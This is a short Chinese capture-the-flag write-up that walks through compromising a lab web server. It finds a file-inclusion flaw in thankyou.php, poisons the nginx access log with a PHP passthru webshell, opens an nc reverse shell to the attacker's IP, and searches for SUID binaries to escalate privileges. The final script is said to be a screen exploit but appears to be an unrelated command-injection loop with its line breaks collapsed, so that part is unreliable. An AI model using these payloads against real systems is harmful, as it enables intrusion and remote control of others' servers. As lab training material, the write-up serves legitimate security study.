使用 nmap 扫描端口
在 contact 填写完以后,返回一个 thankyou.php 有文件包含漏洞
!?怎么找到的??
大佬们通过扫目录,扫出来的结果去看了一下(字典实在是太大,我就不扫了,白费劲)
发现 footer.php 这个页面每次加载都是不一样的
然后在 thankyou.php 也有这样的情况,所以有理由怀疑是 thankyou.php 包含了这个文件
同时 fuzz 试出来一个 file 参数
mark 一下,收集一些字典整理一下,好久之前就应该做这个事情了
在扫描端口阶段注意到这是个 nginx 的服务,通过包含日志文件来 getshell
带着这个访问:
<?php passthru($_GET['yichen']); ?>
然后如包含日志文件 /var/log/nginx/access.log,同时可以跟上命令了
那既然这样,就 nc 反弹一个 shell 把,在 kali 上监听一个 6666 端口
nc -lvp 6666
浏览器访问一下就连上了
192.168.149.163/thankyou.php?file=/var/log/nginx/access.log&yichen=nc 192.168.149.141 6666 -c /bin/bash
提权
suid 提权:
find / -user root -perm -4000 -print 2>/dev/null
先看一下有没有能用的
搜一下 searchsploit screen
分别把两个 C 语言文件拷出来,按照 sh 脚本的命令编译好了(然后把前面的去掉就可以了)然后用 vi 打开该 sh 文件,使用 :set ff=unix,然后保存
#!/bin/shecho $0;URL="${1}"while true;do echo -n "$ "; read cmd curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1done
然后再通过 nc 传过去
执行脚本提权